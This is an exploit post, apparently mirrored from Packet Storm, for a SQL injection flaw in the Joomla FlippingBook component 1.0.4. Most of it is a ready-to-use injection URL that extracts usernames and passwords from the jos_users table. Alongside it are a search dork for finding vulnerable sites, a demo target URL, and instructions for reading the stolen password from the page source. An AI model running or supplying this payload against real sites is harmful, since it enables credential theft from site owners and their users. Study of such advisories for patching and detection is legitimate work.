The Joomla FlippingBook component version 1.0.4 suffers from a SQL injection vulnerability.
b91cf82667d49b834c132ef9019b45a75e0ef8c89098c2e62799cb06f026b896 [ A L G E R I A S E C U R I T Y C R E W ]
##########################################
#
# [ Joomla Component FlippingBook 1.0.4 SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.Dz-Secure.com
[~] Greetings: to all hackers DZ . . .
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'FlippingBook'
[~] Version() : 1.0.4
###########################################
#
# DORK 1 : inurl:com_flippingbook
#
###########################################
[+]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook
[+]Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
[+] : Open the source page to see the 'password'
###########################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed